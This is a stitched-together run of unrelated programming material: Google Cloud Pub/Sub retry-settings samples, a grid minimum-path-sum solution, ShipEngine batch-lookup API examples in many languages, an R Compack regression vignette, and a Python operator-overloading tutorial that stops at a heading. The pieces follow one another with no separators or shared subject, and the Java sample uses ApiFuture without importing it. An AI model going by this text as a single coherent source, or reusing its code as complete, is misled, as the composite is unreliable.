import com.google.api.gax.retrying.RetrySettings;
import com.google.cloud.pubsub.v1.Publisher;
import com.google.protobuf.ByteString;
import com.google.pubsub.v1.PubsubMessage;
import com.google.pubsub.v1.TopicName;
import java.io.IOException;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.TimeUnit;
import org.threeten.bp.Duration;
public class PublishWithRetrySettingsExample {
public static void main(String... args) throws Exception {
// TODO(developer): Replace these variables before running the sample.
String projectId = "your-project-id";
String topicId = "your-topic-id";
publishWithRetrySettingsExample(projectId, topicId);
}
public static void publishWithRetrySettingsExample(String projectId, String topicId)
throws IOException, ExecutionException, InterruptedException {
TopicName topicName = TopicName.of(projectId, topicId);
Publisher publisher = null;
try {
// Retry settings control how the publisher handles retry-able failures
Duration initialRetryDelay = Duration.ofMillis(100); // default: 100 ms
double retryDelayMultiplier = 2.0; // back off for repeated failures, default: 1.3
Duration maxRetryDelay = Duration.ofSeconds(60); // default : 60 seconds
Duration initialRpcTimeout = Duration.ofSeconds(1); // default: 5 seconds
double rpcTimeoutMultiplier = 1.0; // default: 1.0
Duration maxRpcTimeout = Duration.ofSeconds(600); // default: 600 seconds
Duration totalTimeout = Duration.ofSeconds(600); // default: 600 seconds
RetrySettings retrySettings =
RetrySettings.newBuilder()
.setInitialRetryDelay(initialRetryDelay)
.setRetryDelayMultiplier(retryDelayMultiplier)
.setMaxRetryDelay(maxRetryDelay)
.setInitialRpcTimeout(initialRpcTimeout)
.setRpcTimeoutMultiplier(rpcTimeoutMultiplier)
.setMaxRpcTimeout(maxRpcTimeout)
.setTotalTimeout(totalTimeout)
.build();
// Create a publisher instance with default settings bound to the topic
publisher = Publisher.newBuilder(topicName).setRetrySettings(retrySettings).build();
String message = "first message";
ByteString data = ByteString.copyFromUtf8(message);
PubsubMessage pubsubMessage = PubsubMessage.newBuilder().setData(data).build();
// Once published, returns a server-assigned message id (unique within the topic)
ApiFuture<String> messageIdFuture = publisher.publish(pubsubMessage);
String messageId = messageIdFuture.get();
System.out.println("Published a message with retry settings: " + messageId);
} finally {
if (publisher != null) {
// When finished with the publisher, shutdown to free up resources.
publisher.shutdown();
publisher.awaitTermination(1, TimeUnit.MINUTES);
}
}
}
}
Node.js
/**
* TODO(developer): Uncomment these variables before running the sample.
*/
// const projectId = 'YOUR_PROJECT_ID'
// const topicName = 'YOUR_TOPIC_NAME';
// const data = JSON.stringify({foo: 'bar'});
// Imports the Google Cloud client library. v1 is for the lower level
// proto access.
const {v1} = require('@google-cloud/pubsub');
// Creates a publisher client.
const publisherClient = new v1.PublisherClient({
// optional auth parameters
});
async function publishWithRetrySettings() {
const formattedTopic = publisherClient.projectTopicPath(
projectId,
topicName
);
// Publishes the message as a string, e.g. "Hello, world!" or JSON.stringify(someObject)
const dataBuffer = Buffer.from(data);
const messagesElement = {
data: dataBuffer,
};
const messages = [messagesElement];
// Build the request
const request = {
topic: formattedTopic,
messages: messages,
};
// Retry settings control how the publisher handles retryable failures
// Default values are shown
const retrySettings = {
retryCodes: [
10, // 'ABORTED'
1, // 'CANCELLED',
4, // 'DEADLINE_EXCEEDED'
13, // 'INTERNAL'
8, // 'RESOURCE_EXHAUSTED'
14, // 'UNAVAILABLE'
2, // 'UNKNOWN'
],
backoffSettings: {
// The initial delay time, in milliseconds, between the completion
// of the first failed request and the initiation of the first retrying request.
initialRetryDelayMillis: 100,
// The multiplier by which to increase the delay time between the completion
// of failed requests, and the initiation of the subsequent retrying request.
retryDelayMultiplier: 1.3,
// The maximum delay time, in milliseconds, between requests.
// When this value is reached, retryDelayMultiplier will no longer be used to increase delay time.
maxRetryDelayMillis: 60000,
// The initial timeout parameter to the request.
initialRpcTimeoutMillis: 5000,
// The multiplier by which to increase the timeout parameter between failed requests.
rpcTimeoutMultiplier: 1.0,
// The maximum timeout parameter, in milliseconds, for a request. When this value is reached,
// rpcTimeoutMultiplier will no longer be used to increase the timeout.
maxRpcTimeoutMillis: 600000,
// The total time, in milliseconds, starting from when the initial request is sent,
// after which an error will be returned, regardless of the retrying attempts made meanwhile.
totalTimeoutMillis: 600000,
},
};
const [response] = await publisherClient.publish(request, {
retry: retrySettings,
});
console.log(`Message ${response.messageIds} published.`);
}
publishWithRetrySettings().catch(console.error);
Python
from google import api_core
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
# topic_id = "your-topic-id"
# Configure the retry settings. Defaults shown in comments are values applied
# by the library by default, instead of default values in the Retry object.
custom_retry = api_core.retry.Retry(
initial=0.250, # seconds (default: 0.1)
maximum=90.0, # seconds (default: 60.0)
multiplier=1.45, # default: 1.3
deadline=300.0, # seconds (default: 60.0)
predicate=api_core.retry.if_exception_type(
api_core.exceptions.Aborted,
api_core.exceptions.DeadlineExceeded,
api_core.exceptions.InternalServerError,
api_core.exceptions.ResourceExhausted,
api_core.exceptions.ServiceUnavailable,
api_core.exceptions.Unknown,
api_core.exceptions.Cancelled,
),
)
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(project_id, topic_id)
for n in range(1, 10):
    data = "Message number {}".format(n)
    # Data must be a bytestring
    data = data.encode("utf-8")
    future = publisher.publish(topic=topic_path, data=data, retry=custom_retry)
    print(future.result())

print(f"Published messages with retry settings to {topic_path}.")
Description
Given a m x n grid filled with non-negative numbers, find a path from top left to bottom right which minimizes the sum of all numbers along its path.
Note: You can only move either down or right at any point in time.
Example:
Input: [[1,3,1],[1,5,1],[4,2,1]]
Output: 7
Explanation: Because the path 1→3→1→1→1 minimizes the sum.
Explanation
dp(i,j) = grid(i,j) + min(dp(i-1,j), dp(i,j-1)): the cheapest path into a cell arrives from its top or left neighbour, so the table can be filled from the top-left corner.
Python Solution
from typing import List

class Solution:
    def minPathSum(self, grid: List[List[int]]) -> int:
        min_paths = [[0 for j in range(0, len(grid[0]))] for i in range(0, len(grid))]
        min_paths[0][0] = grid[0][0]
        # The first row and first column can each only be reached from one direction
        for j in range(1, len(grid[0])):
            min_paths[0][j] = min_paths[0][j - 1] + grid[0][j]
        for i in range(1, len(grid)):
            min_paths[i][0] = min_paths[i - 1][0] + grid[i][0]
        for i in range(1, len(grid)):
            for j in range(1, len(grid[0])):
                min_paths[i][j] = min(min_paths[i][j - 1], min_paths[i - 1][j]) + grid[i][j]
        return min_paths[len(grid) - 1][len(grid[0]) - 1]
Time complexity: O(MN). We traverse the entire matrix once.
Space complexity: O(MN). Another matrix of the same size is used.
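Since each row of the table only depends on the row above it, the extra matrix can be shrunk to a single row. A minimal sketch of that variant (my own addition, not part of the original solution):

from typing import List

class Solution:
    def minPathSum(self, grid: List[List[int]]) -> int:
        # dp[j] holds the best cost of reaching column j in the current row
        dp = [0] * len(grid[0])
        for i in range(len(grid)):
            for j in range(len(grid[0])):
                if i == 0 and j == 0:
                    dp[j] = grid[0][0]
                elif i == 0:
                    dp[j] = dp[j - 1] + grid[i][j]
                elif j == 0:
                    dp[j] = dp[j] + grid[i][j]
                else:
                    dp[j] = min(dp[j], dp[j - 1]) + grid[i][j]
        return dp[-1]

This keeps the O(MN) time but cuts the extra space down to O(N).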
Get a Batch By External Batch ID
Requirements
Please make sure you read the Using Batches documentation first.
Example
GET /v1/batches/external_batch_id/:external_batch_id
GET /v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46 HTTP/1.1
Host: api.shipengine.com
API-Key: __YOUR_API_KEY_HERE__
curl -iX GET https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46 \
  -H 'API-Key: __YOUR_API_KEY_HERE__'
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Host", "api.shipengine.com")
$headers.Add("API-Key", "__YOUR_API_KEY_HERE__")
$response = Invoke-RestMethod 'https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46' -Method 'GET' -Headers $headers
$response | ConvertTo-Json
var myHeaders = new Headers();
myHeaders.append("Host", "api.shipengine.com");
myHeaders.append("API-Key", "__YOUR_API_KEY_HERE__");
var requestOptions = {
method: 'GET',
headers: myHeaders,
redirect: 'follow'
};
fetch("https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46", requestOptions)
.then(response => response.text())
.then(result => console.log(result))
.catch(error => console.log('error', error));
var request = require('request');
var options = {
'method': 'GET',
'url': 'https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46',
'headers': {
'Host': 'api.shipengine.com',
'API-Key': '__YOUR_API_KEY_HERE__'
}
};
request(options, function (error, response) {
if (error) throw new Error(error);
console.log(response.body);
});
<?php
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_URL => "https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46",
CURLOPT_RETURNTRANSFER => true,
CURLOPT_ENCODING => "",
CURLOPT_MAXREDIRS => 10,
CURLOPT_TIMEOUT => 0,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
CURLOPT_CUSTOMREQUEST => "GET",
CURLOPT_HTTPHEADER => array(
"Host: api.shipengine.com",
"API-Key: __YOUR_API_KEY_HERE__"
),
));
$response = curl_exec($curl);
curl_close($curl);
echo $response;
import requests
url = "https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46"
payload = {}
headers = {
'Host': 'api.shipengine.com',
'API-Key': '__YOUR_API_KEY_HERE__'
}
response = requests.request("GET", url, headers=headers, data = payload)
print(response.text.encode('utf8'))
require "uri"
require "net/http"
url = URI("https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46")
https = Net::HTTP.new(url.host, url.port);
https.use_ssl = true
request = Net::HTTP::Get.new(url)
request["Host"] = "api.shipengine.com"
request["API-Key"] = "__YOUR_API_KEY_HERE__"
response = https.request(request)
puts response.read_body
var client = new RestClient("https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46");
client.Timeout = -1;
var request = new RestRequest(Method.GET);
request.AddHeader("Host", "api.shipengine.com");
request.AddHeader("API-Key", "__YOUR_API_KEY_HERE__");
IRestResponse response = client.Execute(request);
Console.WriteLine(response.Content);
OkHttpClient client = new OkHttpClient().newBuilder()
.build();
Request request = new Request.Builder()
.url("https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46")
.method("GET", null)
.addHeader("Host", "api.shipengine.com")
.addHeader("API-Key", "__YOUR_API_KEY_HERE__")
.build();
Response response = client.newCall(request).execute();
package main
import (
"fmt"
"net/http"
"io/ioutil"
)
func main() {
url := "https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46"
method := "GET"
client := &http.Client {
}
req, err := http.NewRequest(method, url, nil)
if err != nil {
fmt.Println(err)
}
req.Header.Add("Host", "api.shipengine.com")
req.Header.Add("API-Key", "__YOUR_API_KEY_HERE__")
res, err := client.Do(req)
if err != nil {
    fmt.Println(err)
    return
}
defer res.Body.Close()

body, err := ioutil.ReadAll(res.Body)
if err != nil {
    fmt.Println(err)
    return
}
fmt.Println(string(body))
}
#import <Foundation/Foundation.h>
dispatch_semaphore_t sema = dispatch_semaphore_create(0);
NSMutableURLRequest *request = [NSMutableURLRequest requestWithURL:[NSURL URLWithString:@"https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46"]
cachePolicy:NSURLRequestUseProtocolCachePolicy
timeoutInterval:10.0];
NSDictionary *headers = @{
@"Host": @"api.shipengine.com",
@"API-Key": @"__YOUR_API_KEY_HERE__"
};
[request setAllHTTPHeaderFields:headers];
[request setHTTPMethod:@"GET"];
NSURLSession *session = [NSURLSession sharedSession];
NSURLSessionDataTask *dataTask = [session dataTaskWithRequest:request
completionHandler:^(NSData *data, NSURLResponse *response, NSError *error) {
if (error) {
NSLog(@"%@", error);
} else {
NSHTTPURLResponse *httpResponse = (NSHTTPURLResponse *) response;
NSError *parseError = nil;
NSDictionary *responseDictionary = [NSJSONSerialization JSONObjectWithData:data options:0 error:&parseError];
NSLog(@"%@",responseDictionary);
}
// signal in both branches so the semaphore wait below never hangs
dispatch_semaphore_signal(sema);
}];
[dataTask resume];
dispatch_semaphore_wait(sema, DISPATCH_TIME_FOREVER);
import Foundation
var semaphore = DispatchSemaphore (value: 0)
var request = URLRequest(url: URL(string: "https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46")!,timeoutInterval: Double.infinity)
request.addValue("api.shipengine.com", forHTTPHeaderField: "Host")
request.addValue("__YOUR_API_KEY_HERE__", forHTTPHeaderField: "API-Key")
request.httpMethod = "GET"
let task = URLSession.shared.dataTask(with: request) { data, response, error in
guard let data = data else {
print(String(describing: error))
return
}
print(String(data: data, encoding: .utf8)!)
semaphore.signal()
}
task.resume()
semaphore.wait()
{
"label_layout": null,
"label_format": null,
"batch_id": "se-1013790",
"external_batch_id": "32cc2f34-5d9e-466c-8e3f-62c38ad9dc46",
"batch_notes": "2019-7-25 Morning Shipments",
"created_at": "2019-07-25T15:24:46.657Z",
"errors": 0,
"warnings": 0,
"completed": 0,
"forms": 0,
"count": 1,
"batch_shipments_url": {
"href": "https://api.shipengine.com/v1/shipments?batch_id=se-1013790"
},
"batch_labels_url": {
"href": "https://api.shipengine.com/v1/labels?batch_id=se-1013790"
},
"batch_errors_url": {
"href": "https://api.shipengine.com/v1/batches/se-1013790/errors"
},
"label_download": {
"href": "https://api.shipengine.com/v1/downloads/1/uths7PctKUqbM4OfmgzXLg/label-1013790.pdf"
},
"form_download": {
"href": "https://api.shipengine.com/v1/downloads/1/xKVZeKA650-bvQB_oriYkQ/form-1013790.pdf"
},
"status": "open"
}
Install the package
## on CRAN
## install.packages("Compack")
library(Compack)
Regression with functional compositional predictors
Generate data
library(Compack)
df_beta = 5
p = 30
beta_C_true = matrix(0, nrow = p, ncol = df_beta)
beta_C_true[1, ] <- c(-0.5, -0.5, -0.5 , -1, -1)
beta_C_true[2, ] <- c(0.8, 0.8, 0.7, 0.6, 0.6)
beta_C_true[3, ] <- c(-0.8, -0.8 , 0.4 , 1 , 1)
beta_C_true[4, ] <- c(0.5, 0.5, -0.6 ,-0.6, -0.6)
n_train = 50
n_test = 30
Data <- Fcomp_Model(n = n_train, p = p, m = 0, intercept = TRUE,
SNR = 4, sigma = 3, rho_X = 0.6, rho_T = 0.2,
df_beta = df_beta, n_T = 20, obs_spar = 1, theta.add = FALSE,
beta_C = as.vector(t(beta_C_true)))
arg_list <- as.list(Data$call)[-1]
arg_list$n <- n_test
Test <- do.call(Fcomp_Model, arg_list)
Sparse log-contrast regression with functional compositional predictors
m1 <- FuncompCGL(y = Data$data$y, X = Data$data$Comp,
Zc = Data$data$Zc, intercept = Data$data$intercept,
k = df_beta)
plot(m1, xlab = "-log")
betamat <- coef(m1)
predmat <- predict(m1, Data$data$Comp, Data$data$Zc)
Cross-Validation tuned model
Linearly constrained group lasso criterion: CGL
k_list = c(4,5,6)
nfolds = 10
foldid <- sample(rep(seq(nfolds), length = n_train))
## cv_cgl: Constrained group lasso
cv_cgl <- cv.FuncompCGL(y = Data$data$y, X = Data$data$Comp,
Zc = Data$data$Zc, intercept = Data$data$intercept,
k = k_list, foldid = foldid,
keep = TRUE)
plot(cv_cgl,k = k_list)
cv_cgl$Ftrim[c("lam.min", "lam.1se")]
## $lam.min
## lam df
## 0.005003941 4.000000000
##
## $lam.1se
## lam df
## 0.01203433 4.00000000
beta <- coef(cv_cgl, trim = FALSE, s = "lam.min")
k_opt <- cv_cgl$Ftrim$lam.min['df']
plot(cv_cgl$FuncompCGL.fit[[as.character(k_opt)]])
m1 <- ifelse(is.null(ncol(Data$data$Zc)), 0, ncol(Data$data$Zc))
m1 <- m1 + Data$data$intercept
if(k_opt == df_beta) {
plot(Data$beta, col = "red", pch = 19,
ylim = range(c(range(Data$beta), range(beta))))
abline(v= seq(from = 0, to = (p*df_beta), by = df_beta ))
abline(h = 0)
points(beta)
if(m1 > 0) points(p*df_beta + 1:m1, tail(Data$beta, m1),
col = "blue", pch = 19)
} else {
plot(beta, ylim = range(c(range(Data$beta), range(beta))) )
abline(v= seq(from = 0, to = (p*k_opt), by = k_opt ))
abline(h = 0, col = "red")
if(m1 > 0) points(p*k_opt + 1:m1, tail(Data$beta, m1),
col = "blue", pch = 19)
}
beta_C <- matrix(beta[1:(p*k_opt)], byrow = TRUE, nrow = p)
## satisfies zero-sum constraints
cat("colSums:", colSums(beta_C))
## colSums: 4.167479e-09 -5.502439e-09 -9.87453e-09 -5.177147e-09
Nonzero <- (1:p)[apply(beta_C, 1, function(x) max(abs(x)) >0)]
cat("selected groups:", Nonzero)
## selected groups: 1 2 3 4 6 7 8 9 10 12 14 15 21 25 27 28 30
sseq <- Data$basis.info[, 1]
beta_curve_true <- Data$basis.info[, -1] %*% t(beta_C_true)
Nonzero_true <- (1:p)[apply(beta_C_true, 1, function(x) max(abs(x)) >0)]
matplot(sseq, beta_curve_true, type = "l", ylim = range(beta_curve_true),
ylab = "True coeffcients curves", xlab = "TIME")
abline(a = 0, b = 0, col = "grey", lwd = 2)
text(0, beta_curve_true[1, Nonzero_true], labels = Nonzero_true)
beta_curve <- splines::bs(sseq, df = k_opt, intercept = TRUE) %*% t(beta_C)
matplot(sseq, beta_curve, type = "l", ylim = range(beta_curve_true),
ylab = "Estimated coefficient curves", xlab = "TIME")
abline(a = 0, b = 0, col = "grey", lwd = 2)
text(0, beta_curve[1, Nonzero], labels = Nonzero)
## set a threshold for variable selection via the cross-validation model
## example: cut by the average L2-norm of the estimated coefficient curves
Curve_L2 <- colSums(beta_curve^2)
Curve_L2 <- Curve_L2 - colSums(beta_curve[c(1, nrow(beta_curve)), ]^2) / 2
Curve_L2 <- Curve_L2 * (Data$basis.info[2,1] - Data$basis.info[1,1])
Curve_L2 <- sqrt(Curve_L2)
plot(Curve_L2, xlab = "Component index", ylab = "L2-norm for coefficient curves")
cutoff <- sum(Curve_L2) / p
Nonzero_cut <- (1:p)[which(Curve_L2 >= cutoff)]
cat("selected groups after thresholding cut-off:", Nonzero_cut)
## selected groups after thresholding cut-off: 1 2 3 4
y_hat <- predict(cv_cgl, Data$data$Comp, Data$data$Zc, s = "lam.min")
MSE <- sum((drop(Data$data$y) - y_hat)^2) / n_train
y_hat <- predict(cv_cgl, Test$data$Comp, Test$data$Zc, s = "lam.min")
PRE <- sum((drop(Test$data$y) - y_hat)^2) / n_test
cgl_result <- list(cv.result = cv_cgl, beta = beta,
Nonzero = c("Original" = Nonzero, "Cut" = Nonzero_cut),
MSE = MSE, PRE = PRE)
Ignoring the one-sum constraint of compositional data: naive
## set mu_raio = 0 to identifying without linear constraints,
## no outer_loop for Lagrange augmented multiplier
cv_naive <- cv.FuncompCGL(y = Data$data$y, X = Data$data$Comp,
Zc = Data$data$Zc, intercept = Data$data$intercept,
k = k_list, foldid = foldid, keep = TRUE,
mu_ratio = 0)
plot(cv_naive, k = k_list)
beta <- coef(cv_naive, trim = FALSE, s = "lam.min")
k_opt <- cv_naive$Ftrim$lam.min['df']
beta_C <- matrix(beta[1:(p*k_opt)], byrow = TRUE, nrow = p)
## does NOT satisfy zero-sum constraints
cat("colSums:", colSums(beta_C))
## colSums: -0.2672194 -0.1827702 0.1566777 -0.2521267
Nonzero <- (1:p)[apply(beta_C, 1, function(x) max(abs(x)) >0)]
beta_curve <- splines::bs(sseq, df = k_opt, intercept = TRUE) %*% t(beta_C)
Curve_L2 <- colSums(beta_curve^2) - colSums(beta_curve[c(1, nrow(beta_curve)), ]^2) / 2
Curve_L2 <- sqrt(Curve_L2 * (Data$basis.info[2,1] - Data$basis.info[1,1]))
cutoff <- sum(Curve_L2) / p
Nonzero_cut <- (1:p)[which(Curve_L2 >= cutoff)]
MSE <- sum((drop(Data$data$y) - predict(cv_naive, Data$data$Comp, Data$data$Zc, s = "lam.min"))^2) / n_train
PRE <- sum((drop(Test$data$y) - predict(cv_naive, Test$data$Comp, Test$data$Zc, s = "lam.min"))^2) / n_test
naive_result <- list(cv.result = cv_naive, beta = beta,
Nonzero = c("Original" = Nonzero, "Cut" = Nonzero_cut),
MSE = MSE, PRE = PRE)
Randomly select a component of the composition as the reference level
## mu_ratio is set to 0 automatically once ref is set to an integer
ref = sample(1:p, 1)
cv_base <- cv.FuncompCGL(y = Data$data$y, X = Data$data$Comp,
Zc = Data$data$Zc, intercept = Data$data$intercept,
k = k_list, foldid = foldid, keep = TRUE,
ref = ref)
plot(cv_base, k = k_list)
beta <- coef(cv_base, trim = FALSE, s = "lam.min")
k_opt <- cv_base$Ftrim$lam.min['df']
beta_C <- matrix(beta[1:(p*k_opt)], byrow = TRUE, nrow = p)
## satisfies zero-sum constraints
cat("colSums:", colSums(beta_C))
## colSums: -3.469447e-18 2.168404e-18 2.602085e-18 6.938894e-18
Nonzero <- (1:p)[apply(beta_C, 1, function(x) max(abs(x)) >0)]
beta_curve <- splines::bs(sseq, df = k_opt, intercept = TRUE) %*% t(beta_C)
Curve_L2 <- colSums(beta_curve^2) - colSums(beta_curve[c(1, nrow(beta_curve)), ]^2) / 2
Curve_L2 <- sqrt(Curve_L2 * (Data$basis.info[2,1] - Data$basis.info[1,1]))
cutoff <- sum(Curve_L2) / p
Nonzero_cut <- (1:p)[which(Curve_L2 >= cutoff)]
MSE <- sum((drop(Data$data$y) - predict(cv_base, Data$data$Comp, Data$data$Zc, s = "lam.min"))^2) / n_train
PRE <- sum((drop(Test$data$y) - predict(cv_base, Test$data$Comp, Test$data$Zc, s = "lam.min"))^2) / n_test
base_result <- list(cv.result = cv_base, beta = beta,
Nonzero = c("Original" = Nonzero, "Cut" = Nonzero_cut),
MSE = MSE, PRE = PRE)
GIC tuned model
Linearly constrained group lasso criterion: CGL
GIC_cgl <- GIC.FuncompCGL(y = Data$data$y, X = Data$data$Comp,
Zc = Data$data$Zc, intercept = Data$data$intercept,
k = k_list)
beta <- coef(GIC_cgl)
plot(GIC_cgl)
y_hat <- predict(GIC_cgl, Znew = Test$data$Comp, Zcnew = Test$data$Zc)
plot(Test$data$y, y_hat, xlab = "Observed response", ylab = "Predicted response")
Ignoring the one-sum constraint of compositional data: naive
GIC_naive <- GIC.FuncompCGL(y = Data$data$y, X = Data$data$Comp,
Zc = Data$data$Zc, intercept = Data$data$intercept,
k = k_list, mu_ratio = 0)
beta <- coef(GIC_naive)
plot(GIC_naive)
y_hat <- predict(GIC_naive, Znew = Test$data$Comp, Zcnew = Test$data$Zc)
plot(Test$data$y, y_hat, xlab = "Observed response", ylab = "Predicted response")
Randomly select a component of the composition as the reference level
GIC_base <- GIC.FuncompCGL(y = Data$data$y, X = Data$data$Comp,
Zc = Data$data$Zc, intercept = Data$data$intercept,
k = k_list, ref = ref)
beta <- coef(GIC_base)
plot(GIC_base)
y_hat <- predict(GIC_base, Znew = Test$data$Comp, Zcnew = Test$data$Zc)
plot(Test$data$y, y_hat, xlab = "Observed response", ylab = "Predicted response")
Regression with compositional predictors
Generate data
library(Compack)
p = 30
n = 50
beta = c(1, -0.8, 0.6, 0, 0, -1.5, -0.5, 1.2)
beta = c(beta, rep(0, times = p - length(beta)))
Comp_data = comp_Model(n = n, p = p, beta = beta, intercept = FALSE)
Comp_data2 = comp_Model(n = n, p = p, beta = Comp_data$beta, intercept = FALSE)
Sparse log-contrast regression with compositional predictors
m1 <- compCL(y = Comp_data$y, Z = Comp_data$X.comp,
Zc = Comp_data$Zc, intercept = Comp_data$intercept)
plot(m1, label = TRUE)
coef(m1)[1:10, 90:100]
## L90 L91 L92 L93 L94 L95
## Z1 0.92406820 0.92547909 0.92393318 0.92468211 0.92482516 0.92499664
## Z2 -0.66133490 -0.66328703 -0.66439024 -0.66621092 -0.66758205 -0.66890518
## Z3 0.58299125 0.58434121 0.58253225 0.58270957 0.58266568 0.58257745
## Z4 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
## Z5 0.04906269 0.04925977 0.05387758 0.05507937 0.05690799 0.05856053
## Z6 -1.44762276 -1.44781669 -1.45108388 -1.45185109 -1.45315509 -1.45438880
## Z7 -0.29034027 -0.29063399 -0.29528538 -0.29726352 -0.29908001 -0.30087369
## Z8 1.02544144 1.02813418 1.03215631 1.03528559 1.03798521 1.04059747
## Z9 -0.01258296 -0.01473562 -0.01643933 -0.01842473 -0.01998444 -0.02156272
## Z10 -0.11472875 -0.11498203 -0.11470839 -0.11519857 -0.11511888 -0.11536527
## L96 L97 L98 L99 L100
## Z1 0.92528297 0.92544175 0.92555603 0.92573786 0.92614382
## Z2 -0.67023889 -0.67159139 -0.67288982 -0.67415268 -0.67543773
## Z3 0.58278803 0.58302517 0.58317946 0.58337527 0.58363210
## Z4 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
## Z5 0.05989629 0.06128825 0.06265640 0.06387050 0.06490137
## Z6 -1.45558553 -1.45673691 -1.45775937 -1.45876054 -1.46061136
## Z7 -0.30234935 -0.30400968 -0.30576860 -0.30729023 -0.30818420
## Z8 1.04290265 1.04505940 1.04710022 1.04896656 1.05050565
## Z9 -0.02305226 -0.02429200 -0.02541595 -0.02649356 -0.02785752
## Z10 -0.11561523 -0.11568306 -0.11564942 -0.11550258 -0.11480866
Cross-Validation tuned model
cvm1 <- cv.compCL(y = Comp_data$y, Z = Comp_data$X.comp,
Zc = Comp_data$Zc, intercept = Comp_data$intercept)
plot(cvm1, xlab = "-log")
beta_est <- coef(cvm1, s = "lam.min")
head(beta_est, 10)
## 1
## Z1 0.90048789
## Z2 -0.62012673
## Z3 0.58372632
## Z4 0.00000000
## Z5 0.01756609
## Z6 -1.38814631
## Z7 -0.23387376
## Z8 0.94222496
## Z9 0.00000000
## Z10 -0.09116647
sum(beta_est[1:p]) # satisfies zero-sum constraint
## [1] 5.516289e-09
y_hat <- predict(cvm1, Comp_data2$X.comp, Comp_data2$Zc, s = "lam.min")
GIC tuned model
GICm1 <- GIC.compCL(y = Comp_data$y, Z = Comp_data$X.comp,
Zc = Comp_data$Zc, intercept = Comp_data$intercept)
plot(GICm1, xlab = "-log")
beta_est <- coef(GICm1, s = "lam.min")
head(beta_est, 10)
## 1
## Z1 0.85898896
## Z2 -0.56310354
## Z3 0.58218204
## Z4 0.00000000
## Z5 0.00000000
## Z6 -1.32214479
## Z7 -0.14017233
## Z8 0.82199822
## Z9 0.00000000
## Z10 -0.08630774
sum(beta_est[1:p]) # satisfies zero-sum constraint
## [1] 6.958372e-09
y_hat <- predict(GICm1, Comp_data2$X.comp, Comp_data2$Zc, s = "lam.min")
Operator overloading in Python
You can change what a Python operator means depending on the operands it is used with; this is called operator overloading.
What is operator overloading in Python?
Python operators work through built-in functions, but one operator can perform many different operations. For example, with the '+' operator you can add two numbers arithmetically, concatenate two lists, or join two strings together.
This feature of Python is called operator overloading: it allows the same operator to behave differently depending on the context.
So what happens when we apply an operator to objects of a user-defined class? Consider the following example, which models a point in a two-dimensional coordinate system:
class Point:
    def __init__(self, x = 0, y = 0):
        self.x = x
        self.y = y
We run the program and create some points:
>>> p1 = Point(2,3)
>>> p2 = Point(-1,2)
>>> p1 + p2
Traceback (most recent call last):
...
TypeError: unsupported operand type(s) for +: 'Point' and 'Point'
The program immediately raises a TypeError, because Python does not know how to combine two Point objects.
To handle this, we use operator overloading.
First, let's go over a few special functions.
Special functions in Python
Class methods that begin with two consecutive underscores (__) are special functions, carrying special meanings.
There are many special functions in Python; one of them is __init__(), which Quantrimang introduced earlier in the lesson on classes and objects. That function is called whenever a new object of the class is created.
The purpose of these special functions is to make our classes compatible with Python's built-in functions.
>>> p1 = Point(2,3)
>>> print(p1)
<__main__.Point object at 0x00000000031F8CC0>
You should define the __str__() method in the class to control how the printed output is displayed.
class Point:
    def __init__(self, x = 0, y = 0):
        self.x = x
        self.y = y

    def __str__(self):
        return "({0},{1})".format(self.x,self.y)
Now try print() again:
>>> p1 = Point(2,3)
>>> print(p1)
(2,3)
Using __str__() gives a much cleaner printed result. You can also produce the same output with Python's built-in str() or format() functions.
>>> str(p1)
'(2,3)'
>>> format(p1)
'(2,3)'
When you use str() or format(), Python calls p1.__str__(), so the result is the same.
Overloading the '+' operator in Python
To overload the '+' operator, we implement the __add__() method in the class. This method can do whatever we need, for example adding the coordinates of the two points from the example above.
class Point:
    def __init__(self, x = 0, y = 0):
        self.x = x
        self.y = y

    def __str__(self):
        return "({0},{1})".format(self.x,self.y)

    def __add__(self, other):
        x = self.x + other.x
        y = self.y + other.y
        return Point(x, y)
We run the program and create some points:
>>> p1 = Point(2,3)
>>> p2 = Point(-1,2)
>>> print(p1 + p2)
(1,5)
In this program, when you evaluate p1 + p2, Python calls p1.__add__(p2).
Similarly, you can overload many other operators. The table below lists some special functions used for operator overloading:
Operator Expression Internally
Addition p1 + p2 p1.__add__(p2)
Subtraction p1 - p2 p1.__sub__(p2)
Multiplication p1 * p2 p1.__mul__(p2)
Power p1 ** p2 p1.__pow__(p2)
Division p1 / p2 p1.__truediv__(p2)
Floor division p1 // p2 p1.__floordiv__(p2)
Remainder (modulo) p1 % p2 p1.__mod__(p2)
Bitwise left shift p1 << p2 p1.__lshift__(p2)
Bitwise right shift p1 >> p2 p1.__rshift__(p2)
Bitwise AND p1 & p2 p1.__and__(p2)
Bitwise OR p1 | p2 p1.__or__(p2)
Bitwise XOR p1 ^ p2 p1.__xor__(p2)
Bitwise NOT ~p1 p1.__invert__()
Overloading comparison operators in Python
